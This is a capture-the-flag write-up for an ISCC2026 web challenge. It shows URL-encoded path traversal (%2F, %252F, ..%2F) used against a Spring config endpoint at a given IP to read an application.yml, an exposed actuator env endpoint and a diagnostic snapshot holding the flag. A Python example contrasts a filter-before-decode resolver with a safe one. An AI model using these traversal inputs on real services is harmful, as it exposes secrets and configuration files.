Web-Reverse Traversal

ISCC2026 WriteUp Submission Template

Solution approach

1. First, translate it

image.png

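Clearly we need to access this endpoint: /config/{app}/{profile}/{filename}. My guess is that the backend splits the {filename} parameter and resolves it as a file path, accepting either an absolute or a relative path.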

Following the hint, access: http://39.105.213.28:12602/config/app/dev/application.yml
Response: server: port: 8080 hint: 'This is just a mock repository config. The real secrets are in the main application.yml at the system root (/app/application.yml).'
Next, access http://39.105.213.28:12602/config/app/dev/app/application.yml. It cannot be accessed, probably blocked by a WAF, so try URL encoding: /app/application.yml -> %2Fapp%2Fapplication%2Eyml
Access: http://39.105.213.28:12602/config/app/dev/%2Fapp%2Fapplication.yml
Response:

    server:
      port: 8080
    spring:
      application:
        name: cloud-config-central
    management:
      endpoints:
        web:
          base-path: "/internal-monitor-xyz123"
          exposure:
            include: "env"
      endpoint:
        env:
          keys-to-sanitize: "password,secret,key,token,.*credentials.*,vcap_services,FLAG"
    system:
      diagnostic:
        auto-dump: true
        last-crash-time: "2026-03-10T08:15:32Z"
        backup-download-path: ${SYSTEM_DIAGNOSTIC_BACKUP_DOWNLOAD_PATH}

Key findings:

  • management: endpoints: web: base-path: "/internal-monitor-xyz123"
  • backup-download-path: ${SYSTEM_DIAGNOSTIC_BACKUP_DOWNLOAD_PATH}
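
Why the encoded filename got through, and the check that stops it, as an added example that is not part of the original write-up or the challenge's code. The backend's real implementation is not shown on the page, so `naive_resolve` is an assumed model of a filter that runs before percent-decoding, and `REPO_ROOT`, `safe_resolve` and `outcome` are hypothetical names.

```python
import posixpath
from urllib.parse import unquote

REPO_ROOT = "/app/config-repo"  # assumed repository directory (not given on the page)

def naive_resolve(raw: str) -> str:
    """Flawed pattern (assumed model of the backend): filter first, decode later."""
    if "/" in raw or ".." in raw:          # inspects the still-encoded text
        raise ValueError("blocked by filter")
    decoded = unquote(raw)                 # %2F turns into "/" only after the check
    # join() discards REPO_ROOT when the second argument is absolute
    return posixpath.normpath(posixpath.join(REPO_ROOT, decoded))

def safe_resolve(raw: str) -> str:
    """Decode to a fixed point, canonicalise, then confine to REPO_ROOT."""
    decoded = raw
    for _ in range(5):                     # bounded number of decoding passes
        step = unquote(decoded)
        if step == decoded:
            break
        decoded = step
    else:
        raise ValueError("too many encoding layers")
    if decoded.startswith("/") or "\\" in decoded or "\x00" in decoded:
        raise ValueError("absolute path or illegal character")
    candidate = posixpath.normpath(posixpath.join(REPO_ROOT, decoded))
    # A real service would also resolve symlinks (os.path.realpath) before this check.
    if posixpath.commonpath([REPO_ROOT, candidate]) != REPO_ROOT:
        raise ValueError("escapes repository root")
    return candidate

def outcome(resolver, raw: str) -> str:
    """Return the resolved path, or 'REJECTED' if the resolver refuses the input."""
    try:
        return resolver(raw)
    except ValueError:
        return "REJECTED"

# Constructed sample inputs; the second is the encoded form used in the write-up.
SAMPLES = ["application.yml", "%2Fapp%2Fapplication.yml",
           "%252Fapp%252Fapplication.yml", "..%2F..%2Fapplication.yml"]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s:30} naive={outcome(naive_resolve, s):45} safe={outcome(safe_resolve, s)}")
```

The same ordering applies in any language: decode fully, canonicalise, then compare against the allowed root, and never validate the raw request string.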

First, visit that address:

image.png

Then visit the link that contains env. A lot of content comes back; following the hint from the previous step, search it for SYSTEM_DIAGNOSTIC_BACKUP_DOWNLOAD_PATH.

image.png

Access /api/v3/internal/dev/diagnostics/snapshot/8e2f1a4b.dat and download the file.

image.png

It also contains a great deal of content.

image.png

A quick search turns it up: ISCC{Double_Decode_Spring_Bingo_2026}

Exp

posted @ 2026-05-19 16:32  MillionMind